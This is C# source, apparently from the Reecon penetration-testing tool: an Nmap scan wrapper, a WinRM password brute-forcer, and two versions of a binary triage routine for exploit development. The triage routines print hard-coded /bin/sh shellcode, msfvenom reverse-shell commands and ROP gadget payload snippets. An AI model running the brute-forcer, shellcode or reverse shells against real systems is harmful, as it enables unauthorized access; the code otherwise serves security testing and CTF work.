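        /// <summary>
        /// Runs the tool's default Nmap scan (<c>-sS -p- --min-rate=5000</c>) against one target and writes
        /// greppable output to <c>{fileName}.nmap</c> for the rest of the tool to read.
        /// </summary>
        /// <param name="args">
        /// <c>args[0]</c> is the target; <c>args[1]</c> (optional) is the output file name without extension.
        /// When only the target is given, the file name is read from stdin.
        /// </param>
        /// <param name="mustPing">
        /// <c>false</c> adds <c>-Pn</c>, so Nmap skips host discovery and scans the target regardless.
        /// </param>
        /// <returns>The output file name without the <c>.nmap</c> extension.</returns>
        /// <remarks>
        /// Exits the process with code 1 (previously 0, which read as success to a calling shell) on a usage
        /// error, a missing <c>nmap</c> binary, or a target / file name containing whitespace: both values are
        /// spliced into the Nmap argument string, so a value with spaces would be parsed by Nmap as extra
        /// arguments instead of one name. More than two arguments used to fall through and run Nmap with an
        /// empty target; that is now a usage error too.
        /// </remarks>
        public static string DefaultScan(string[] args, bool mustPing)
        {
            // ip[0]
            // outputfile[1]
            if (args == null || args.Length < 1 || args.Length > 2)
            {
                Console.WriteLine("Usage: ip outfile");
                Environment.Exit(1);
            }

            string target = args[0];
            string fileName;
            if (args.Length == 2)
            {
                fileName = args[1];
            }
            else
            {
                Console.WriteLine("Outfile name (1 word, no extension)");
                // ReadLine returns null on EOF (piped / closed stdin); treat that as "no name given".
                fileName = Console.ReadLine() ?? "";
            }

            if (!IsSingleToken(target) || !IsSingleToken(fileName))
            {
                Console.WriteLine("Error - target and outfile must each be a single word without spaces");
                Environment.Exit(1);
            }

            // Check if nmap is installed
            if (!General.IsInstalledOnLinux("nmap"))
            {
                Console.WriteLine("Error - nmap is not installed");
                Environment.Exit(1);
            }

            Console.WriteLine($"Doing an optimized Nmap scan on {target} - This may take awhile...");
            string noPing = mustPing ? "" : " -Pn ";
            // Same argument string on both platforms; only the launcher differs.
            string nmapArgs = $"-sS -p- {noPing} --min-rate=5000 {target} -oG {fileName}.nmap";

            // Stopwatch is monotonic; DateTime.Now would mis-measure across a wall-clock change.
            System.Diagnostics.Stopwatch scanTimer = System.Diagnostics.Stopwatch.StartNew();
            if (General.GetOS() == General.OS.Linux)
            {
                // On Linux the scan is launched through sudo (-sS needs raw sockets).
                General.RunProcess("sudo", "nmap " + nmapArgs);
            }
            else
            {
                General.RunProcess("nmap", nmapArgs);
            }
            scanTimer.Stop();

            Console.WriteLine("Scan complete in " + string.Format("{0:0.00}s", scanTimer.Elapsed.TotalSeconds) + $" - {fileName}.nmap for reecon");
            return fileName;
        }

        /// <summary>
        /// True when <paramref name="value"/> is non-empty and contains no whitespace, i.e. it will survive
        /// being spliced into a process argument string as exactly one argument.
        /// </summary>
        private static bool IsSingleToken(string value)
        {
            if (string.IsNullOrEmpty(value))
            {
                return false;
            }
            foreach (char c in value)
            {
                if (char.IsWhiteSpace(c))
                {
                    return false;
                }
            }
            return true;
        }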
        /// <summary>
        /// Tries every user/password pair from the two word-list files against WinRM on <paramref name="ip"/> by
        /// running PowerShell's <c>Test-WSMan</c> with a <c>PSCredential</c>, printing "Success!" or "Failed" per pair.
        /// </summary>
        /// <param name="ip">Remote host; it is also written to the local WSMan <c>TrustedHosts</c> list for the run.</param>
        /// <param name="userFile">Path to a file with one user name per line.</param>
        /// <param name="passFile">Path to a file with one password per line.</param>
        /// <remarks>
        /// Local side effect: <c>TrustedHosts</c> is overwritten with <paramref name="ip"/> at the start and set to an
        /// empty string at the end, so any value configured before the run is lost rather than restored.
        /// Needs an elevated console; the only permission failure recognised is the exact English
        /// "Access is denied." line. User names and passwords are spliced into the PowerShell command text
        /// without escaping, so entries containing quotes, <c>$</c> or <c>;</c> are not tested as literal values.
        /// </remarks>
        private static void WinRMBrute_Windows(string ip, string userFile, string passFile)
        {
            // File.ReadAllLines throws (FileNotFoundException etc.) if either list is missing; nothing here catches that.
            List <string> userList = File.ReadAllLines(userFile).ToList();
            List <string> passList = File.ReadAllLines(passFile).ToList();

            // Perms
            // Set-Item replaces the TrustedHosts value (no -Concatenate), so previous entries are dropped here.
            List <string> permLines = General.GetProcessOutput("powershell", @"Set-Item WSMan:\localhost\Client\TrustedHosts " + ip + " -Force");

            if (permLines.Count != 0)
            {
                // Locale-dependent: a non-English PowerShell prints a different message and the loop below runs anyway.
                if (permLines[0].Trim() == "Set-Item : Access is denied.")
                {
                    Console.WriteLine("You need to run Reecon in an Administrative console for this functionality");
                    // Nothing to clean up on this path - the Set-Item above did not take effect.
                    return;
                }
            }
            foreach (string user in userList)
            {
                foreach (string pass in passList)
                {
                    Console.Write("Testing " + user + ":" + pass + " - ");
                    // -erroraction SilentlyContinue suppresses the error output; user/pass/ip go in unescaped.
                    List <string> processResult = General.GetProcessOutput("powershell", "$creds = New-Object System.Management.Automation.PSCredential -ArgumentList ('" + user + "', (ConvertTo-SecureString \"" + pass + "\" -AsPlainText -Force)); Test-WSMan -ComputerName " + ip + " -Credential $creds -Authentication Negotiate -erroraction SilentlyContinue");
                    // Success is inferred purely from "some output was produced"; assumes Test-WSMan prints nothing
                    // on a rejected credential - NOTE(review): not verified here, any stray output counts as success.
                    if (processResult.Count != 0)
                    {
                        Console.ForegroundColor = ConsoleColor.Green;
                        Console.WriteLine("Success!");
                        Console.ForegroundColor = ConsoleColor.White;
                    }
                    else
                    {
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.WriteLine("Failed");
                        Console.ForegroundColor = ConsoleColor.White;
                    }
                }
            }
            // Clears TrustedHosts instead of restoring whatever was configured before the run.
            General.RunProcess("powershell", @"Set-Item WSMan:\localhost\Client\TrustedHosts '' -Force");
        }
        /// <summary>
        /// Prints a static triage of a local ELF binary: its architecture (via <c>IDElf</c>), for x86 the kernel
        /// "segfault at" address logged after piping the fixed cyclic pattern into it, then whatever <c>ropper</c>,
        /// <c>rabin2</c> and <c>objdump</c> report (ret / pop rdi gadgets, the "/bin/sh" string, NX flag, calls to
        /// system, puts PLT/GOT entries, global .text symbols). Each tool is skipped with a message if not installed.
        /// </summary>
        /// <param name="fileName">Path to the binary; must start with "./" (the method returns immediately otherwise).</param>
        /// <remarks>
        /// Runs the target binary (x86 only) and reads <c>dmesg</c>, so it needs a Linux host where both are permitted.
        /// Address handling assumes ropper prints "0x" followed by 16 hex digits (x64); the "/bin/sh" branch accepts a
        /// 10-character (x86-sized) address yet still appends a <c>p64</c> snippet, which is inconsistent.
        /// All output goes to the console; nothing is returned.
        /// </remarks>
        private static void ScanFile(string fileName)
        {
            if (!fileName.StartsWith("./"))
            {
                Console.WriteLine("fileName must start with ./");
                return;
            }

            // Architecture is a project enum; IDElf presumably returns a third value for non-ELF input (else branch below).
            Architecture architecture = IDElf(fileName);

            if (architecture == Architecture.x86)
            {
                Console.WriteLine("Architecture: x86");
                // You can get a segfault address of x86 programs by going
                // dmesg | tail -2 (Sometimes the last entry isn't for it)
                // dmesg | grep "ret2win32" | tail -1

                // pwn cyclic 500
                // aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
                // Pipes the pattern above into the binary via bash; the trailing 5 is presumably a timeout - confirm in General.RunProcess.
                General.RunProcess("/bin/bash", " -c \"echo 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae' | " + fileName + "\"", 5);
                // Reads the whole kernel log; any older matching entry for a same-named binary is reported too.
                List <string> dmesgOutput = General.GetProcessOutput("dmesg", "");
                foreach (string item in dmesgOutput)
                {
                    //  segfault at 6161616c ip 000000006161616c x
                    // TrimStart strips every leading '.' and '/' - e.g. "./.hidden" becomes "hidden".
                    if (item.Contains(fileName.TrimStart("./".ToCharArray())) && item.Contains("segfault at "))
                    {
                        // 12 == "segfault at ".Length; Substring(0, 9) throws if fewer than 9 characters follow.
                        Console.WriteLine("- Cyclic Segfault: " + item.Remove(0, item.IndexOf("segfault at ") + 12).Substring(0, 9));
                    }
                }
            }
            else if (architecture == Architecture.x64)
            {
                Console.WriteLine("Architecture: x64");
                // TODO: Find where it segfaults, -1
            }
            else
            {
                Console.WriteLine("Architecture: Unknown - Can only deal with ELFs");
            }

            if (General.IsInstalledOnLinux("ropper"))
            {
                List <string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"ret;\"");
                foreach (string item in ropperOutput)
                {
                    // [INFO]/[LOAD] are ropper's own status lines; everything else is treated as a gadget line.
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        string pwnItem = item.Trim();
                        pwnItem = pwnItem.Replace(": ret;", "");
                        if (pwnItem.Length == 18) // x64
                        {
                            // 18 == "0x" + 16 hex digits; only the last 6 digits are copied into the snippet.
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                        }
                        else
                        {
                            Console.WriteLine("Not 18 - " + pwnItem.Length);
                        }
                        // Printed for every length, not just the 18-character case.
                        Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
                    }
                }

                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"pop rdi; ret;\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        // Trailing ";;" is a stray empty statement - harmless.
                        string pwnItem = item.Trim();;
                        // Assumes every non-status line contains ": pop rdi; ret;"; other lines pass through unchanged.
                        pwnItem = pwnItem.Replace(": pop rdi; ret;", "");
                        if (pwnItem.Length == 18)
                        {
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                        }
                        else
                        {
                            Console.WriteLine("Not 18 - " + pwnItem.Length);
                        }
                        Console.WriteLine("- pop rdi; ret; (Can set values) --> " + pwnItem);
                    }
                }
                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]") && item.Contains("/bin/sh"))
                    {
                        string pwnItem = item.Trim();
                        pwnItem = pwnItem.Replace("/bin/sh", "").Trim();;
                        // 10 == "0x" + 8 hex digits (x86-sized), but a p64 snippet is still appended - inconsistent with the x64 checks above.
                        if (pwnItem.Length == 10)
                        {
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                        }
                        else
                        {
                            Console.WriteLine("Not 10 - " + pwnItem.Length);
                        }
                        Console.WriteLine("- /bin/sh --> " + pwnItem);
                    }
                }
                // // ropper --file sudo_pwn_file_here --string "/bin/sh"
            }
            else
            {
                Console.WriteLine("- ropper is not installed - Skipping gadget check and string search");
            }
            if (General.IsInstalledOnLinux("rabin2"))
            {
                // fileName already starts with "./" (checked above), so rabin2 is handed "././name".
                List <string> rabin2Output = General.GetProcessOutput("rabin2", "-I ./" + fileName);
                foreach (string item in rabin2Output)
                {
                    // Looks for the "nx" line of rabin2 -I; a value other than true/false is silently ignored.
                    if (item.Trim().StartsWith("nx") && item.Contains("false"))
                    {
                        Console.WriteLine("- nx is disabled - You can run your own shellcode!");
                        if (architecture == Architecture.x64)
                        {
                            // Hard-coded x86-64 shellcode string, printed verbatim.
                            Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05");
                        }
                        else
                        {
                            // http://shell-storm.org/shellcode/
                            Console.WriteLine("Bug Reelix to fix his code!");
                        }
                    }
                    else if (item.Trim().StartsWith("nx") && item.Contains("true"))
                    {
                        Console.WriteLine("- nx is enabled - No custom shellcode for you!");
                    }
                }
            }
            else
            {
                Console.WriteLine("- rabin2 is not installed - Skipping nx check");
            }
            if (General.IsInstalledOnLinux("objdump"))
            {
                // Full disassembly; every line is scanned for the three substrings below.
                List <string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}");
                foreach (string item in objdumpOutput)
                {
                    if (item.Contains("call") && item.Contains("system")) // callq contains call
                    {
                        Console.WriteLine("- system --> " + item);
                    }
                    if (item.Trim().EndsWith(" <puts@plt>:"))
                    {
                        Console.WriteLine("- puts@plt (plt_puts) --> " + item);
                    }
                    if (item.Contains("puts@GLIBC"))
                    {
                        Console.WriteLine("- puts@GLIBC (got_puts) --> " + item);
                    }
                }

                // Symbol table: global (" g ") symbols in .text.
                objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}");
                foreach (string item in objdumpOutput)
                {
                    // .text = Name
                    // " g" = Global
                    if (item.Contains(".text") && item.Contains(" g "))
                    {
                        Console.WriteLine("- Useful Symbol: " + item);
                    }
                }
                // objdump -t ./file.elf | grep .text
            }
            else
            {
                // Message says "syscalls", but the block above looks for system/puts references and global symbols.
                Console.WriteLine("- objdump is not installed - Skipping syscalls");
            }
            Console.WriteLine("Finished");
        }
        /// <summary>
        /// Prints a static triage of a local binary: its type (via <c>IDFile</c>: Linux x86 / x64 or Windows), for
        /// Linux x86 the overflow offset derived from the kernel "segfault at" address after piping the fixed cyclic
        /// pattern into it (needs the <c>pwn</c> CLI), then whatever <c>ropper</c>, <c>rabin2</c> and <c>objdump</c>
        /// report (ret / pop rdi / jmp esp gadgets, the "/bin/sh" string, NX flag and bitness, calls to system,
        /// puts PLT/GOT entries, main / start address, global .text symbols). Each tool is skipped with a message
        /// if not installed.
        /// </summary>
        /// <param name="fileName">Path to the binary; must start with "./" (the method returns immediately otherwise).</param>
        /// <remarks>
        /// Runs the target binary (Linux x86 only) and reads <c>dmesg</c>, so it needs a Linux host where both are
        /// permitted. The rabin2 section dereferences <c>FirstOrDefault(...)</c> without a null check, so a binary for
        /// which rabin2 prints no "nx" (or "bits") line makes this method throw a <see cref="NullReferenceException"/>.
        /// All output goes to the console; nothing is returned.
        /// </remarks>
        private static void ScanFile(string fileName)
        {
            if (!fileName.StartsWith("./"))
            {
                Console.WriteLine("fileName must start with ./");
                return;
            }

            // Architecture is a project enum; IDFile presumably returns a fourth value for unrecognised input (else branch below).
            Architecture architecture = IDFile(fileName);

            if (architecture == Architecture.Linux86)
            {
                Console.WriteLine("Architecture: x86");
                // You can get a segfault address of x86 programs by going
                // dmesg | tail -2 (Sometimes the last entry isn't for it)
                // dmesg | grep "ret2win32" | tail -1

                // pwn cyclic 500
                // aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
                // "pwn" is the pwntools command-line entry point; without it this whole x86 branch is skipped.
                if (General.IsInstalledOnLinux("pwn"))
                {
                    // Pipes the pattern above into the binary via bash; the trailing 5 is presumably a timeout - confirm in General.RunProcess.
                    General.RunProcess("/bin/bash", " -c \"echo 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae' | " + fileName + "\"", 5);
                    // Reads the whole kernel log; any older matching entry for a same-named binary is processed too.
                    List <string> dmesgOutput = General.GetProcessOutput("dmesg", "");
                    foreach (string item in dmesgOutput)
                    {
                        //  segfault at 6161616c ip 000000006161616c x
                        // TrimStart strips every leading '.' and '/' - e.g. "./.hidden" becomes "hidden".
                        if (item.Contains(fileName.TrimStart("./".ToCharArray())) && item.Contains("segfault at "))
                        {
                            // Console.WriteLine("-- Item: " + item);
                            // 12 == "segfault at ".Length; Substring(0, 9) throws if fewer than 9 characters follow.
                            string segfaultHex = item.Remove(0, item.IndexOf("segfault at ") + 12).Substring(0, 9).Trim();
                            // Console.WriteLine("-- segfaultHex: " + segfaultHex);
                            // HEX2ASCII is a project helper; the reversal presumably undoes little-endian byte order - confirm.
                            string pwntoolsSearch = (new string(HEX2ASCII(segfaultHex).Reverse().ToArray()));
                            // Console.WriteLine("-- pwntoolsSearch: " + segfaultHex);
                            // .First() throws InvalidOperationException if pwn prints nothing (e.g. the substring is not in the pattern).
                            string pwnPos = General.GetProcessOutput("pwn", "cyclic -l " + pwntoolsSearch).First();
                            Console.WriteLine("- Cyclic Segfault Overflow Position: " + pwnPos);
                        }
                    }
                }
                else
                {
                    Console.WriteLine("- pwntools is not installed - Skipping auto segfault");
                }
            }
            else if (architecture == Architecture.Linux64)
            {
                Console.WriteLine("Architecture: x64");
                // TODO: Find where it segfaults, -1
            }
            else if (architecture == Architecture.Windows)
            {
                Console.WriteLine("File Type: Windows (Unknown Architecture)");
            }
            else
            {
                Console.WriteLine("Architecture: Unknown - Bug Reelix to fix this!");
            }

            if (General.IsInstalledOnLinux("ropper"))
            {
                List <string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"ret;\"");
                foreach (string item in ropperOutput)
                {
                    // [INFO]/[LOAD] are ropper's own status lines; everything else is treated as a gadget line.
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        string pwnItem = item.Trim();
                        pwnItem = pwnItem.Replace(": ret;", "");
                        if (pwnItem.Length == 18) // x64
                        {
                            // 18 == "0x" + 16 hex digits; only the last 6 digits are copied into the snippet.
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                            Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
                        }
                        else if (pwnItem.Length == 10) // x86
                        {
                            // 10 == "0x" + 8 hex digits; printed as-is, no snippet.
                            Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
                        }
                        else
                        {
                            Console.WriteLine("Error - Unknown ret length: " + pwnItem.Length);
                        }
                    }
                }

                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"pop rdi; ret;\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        if (item.Contains(": pop rdi; ret;"))
                        {
                            string pwnItem = item.Trim();
                            pwnItem = pwnItem.Replace(": pop rdi; ret;", "");
                            if (pwnItem.Length == 18)
                            {
                                // TODO: p64 is only for x64 processes - Check first and implement x86 variant
                                pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                                // 0x16 - x64 address
                                Console.WriteLine("- pop rdi; ret; (Can set values) --> " + pwnItem);
                            }
                            else
                            {
                                // Unlike the "ret;" loop above, a 10-character (x86) hit is only reported here, not printed.
                                Console.WriteLine("Not 18 - " + pwnItem.Length);
                            }
                        }
                        else
                        {
                            Console.WriteLine("Unknown prr item: " + item);
                        }
                    }
                }

                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]") && item.Contains("/bin/sh"))
                    {
                        string pwnItem = item.Trim();
                        // Trailing ";;" is a stray empty statement - harmless.
                        pwnItem = pwnItem.Replace("/bin/sh", "").Trim();;
                        // 10 == "0x" + 8 hex digits (x86-sized), yet the p64 snippet is appended - see the TODO below.
                        if (pwnItem.Length == 10)
                        {
                            // TODO: p64 is only for x64 processes - Check first and implement x86 variant
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                        }
                        else
                        {
                            Console.WriteLine("Not 10 - " + pwnItem.Length);
                        }
                        Console.WriteLine("- /bin/sh --> " + pwnItem);
                    }
                }

                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"jmp esp;\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        if (item.Contains(": jmp esp;"))
                        {
                            string pwnItem = item.Trim();
                            pwnItem = pwnItem.Replace(": jmp esp;", "").Trim();
                            // 10 == "0x" + 8 hex digits (x86 address); the substring checks below rely on exactly that length.
                            if (pwnItem.Length == 10 && pwnItem.Substring(0, 2) == "0x")
                            {
                                // 0x080414c3 -> 080414c3
                                string jmpesp = pwnItem.Remove(0, 2);
                                // 080414c3 -> "\xc3\x14\x04\x08"
                                // Byte pairs emitted in reverse order (little-endian) as \xNN escapes.
                                jmpesp = string.Format("\\x{0}\\x{1}\\x{2}\\x{3}", jmpesp.Substring(6, 2), jmpesp.Substring(4, 2), jmpesp.Substring(2, 2), jmpesp.Substring(0, 2));
                                Console.WriteLine("- jmp esp; --> " + pwnItem + " --> " + jmpesp);
                            }
                            else
                            {
                                // "Invalud" (sic) is part of the runtime message.
                                Console.WriteLine("Invalud length - Bug Reelix!");
                            }
                        }
                        else
                        {
                            Console.WriteLine("Unknown jmp esp Item: " + item);
                        }
                    }
                }
                // // ropper --file sudo_pwn_file_here --string "/bin/sh"
            }
            else
            {
                Console.WriteLine("- ropper is not installed (pip install ropper) - Skipping gadget check and string search");
            }

            if (General.IsInstalledOnLinux("rabin2"))
            {
                // fileName already starts with "./" (checked above), so rabin2 is handed "././name".
                List <string> rabin2Output = General.GetProcessOutput("rabin2", "-I ./" + fileName);
                // FirstOrDefault returns null when there is no "nx" line -> NullReferenceException on .Contains.
                // The same lookup is repeated in the else-if and for "bits" below; caching it would fix both the double scan and the null case.
                if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("nx")).Contains("false"))
                {
                    Console.WriteLine("- nx is disabled - You can run your own shellcode!");
                    if (architecture == Architecture.Linux64) // bits ?
                    {
                        // Hard-coded x86-64 shellcode string, printed verbatim.
                        Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05");
                    }
                    else if (architecture == Architecture.Linux86)
                    {
                        // Hard-coded x86 shellcode string, printed verbatim.
                        Console.WriteLine(@"Linux/x86 - Execute /bin/sh: \x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80");
                    }
                    else if (architecture == Architecture.Windows)
                    {
                        // -f c = Format (Else it just parses raw bytes instead of showing them)
                        // -b = Bad characters
                        // Same null-dereference risk as the "nx" lookup if rabin2 prints no "bits" line.
                        if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("bits")).Contains("32"))
                        {
                            Console.WriteLine("-- Windows - x86 Reverse Shell: msfvenom -p windows/shell_reverse_tcp LHOST=ipHere LPORT=portHere -a x86 --platform windows -f c -b \"\\x00\"");
                        }
                        else if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("bits")).Contains("64"))
                        {
                            Console.WriteLine("-- Windows - x64 Reverse Shell: msfvenom -p windows/shell_reverse_tcp LHOST=ipHere LPORT=portHere -a x64 --platform windows -f c -b \"\\x00\"");
                        }
                        else
                        {
                            // http://shell-storm.org/shellcode/
                            Console.WriteLine("Unknown Inner Arch - Bug Reelix to fix his code!");
                        }
                    }
                    else
                    {
                        // http://shell-storm.org/shellcode/
                        Console.WriteLine("Unknown Outer Arch - Bug Reelix to fix his code!");
                    }
                }
                else if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("nx")).Contains("true"))
                {
                    Console.WriteLine("- nx enabled - No custom shellcode for you!");
                }
            }
            else
            {
                Console.WriteLine("- rabin2 is not installed (sudo apt install radare2 or https://github.com/radareorg/radare2/releases) - Skipping nx check");
            }

            if (General.IsInstalledOnLinux("objdump"))
            {
                // Full disassembly; every line is scanned for the substrings below.
                bool          hasMain       = false;
                List <string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}");
                foreach (string item in objdumpOutput)
                {
                    if (item.Contains("call") && item.Contains("system")) // callq contains call
                    {
                        Console.WriteLine("- system --> " + item);
                    }
                    if (item.Trim().EndsWith(" <puts@plt>:"))
                    {
                        Console.WriteLine("- puts@plt (plt_puts) --> " + item);
                    }
                    if (item.Contains("puts@GLIBC"))
                    {
                        Console.WriteLine("- puts@GLIBC (got_puts) --> " + item);
                    }
                    if (item.Trim().EndsWith(" <main>:"))
                    {
                        hasMain = true;
                        // The EndsWith above guarantees a space exists, so IndexOf(" ") cannot be -1 here.
                        Console.WriteLine("- <main> Address: " + item.Substring(0, item.IndexOf(" ")));
                    }
                }

                // Stripped binaries have no <main> label; fall back to the file header's entry point.
                if (!hasMain)
                {
                    objdumpOutput = General.GetProcessOutput("objdump", $"-f {fileName}");
                    foreach (string item in objdumpOutput)
                    {
                        if (item.Trim().StartsWith("start address "))
                        {
                            Console.WriteLine("- " + item);
                            break;
                        }
                    }
                }

                // Symbol table: global (" g ") symbols in .text.
                objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}");
                foreach (string item in objdumpOutput)
                {
                    // .text = Name
                    // " g" = Global
                    if (item.Contains(".text") && item.Contains(" g "))
                    {
                        Console.WriteLine("- Useful Symbol: " + item);
                    }
                }
                // objdump -t ./file.elf | grep .text
            }
            else
            {
                // Message says "syscalls", but the block above looks for system/puts references, main and global symbols.
                Console.WriteLine("- objdump is not installed - Skipping syscalls");
            }
            Console.WriteLine("Finished");
        }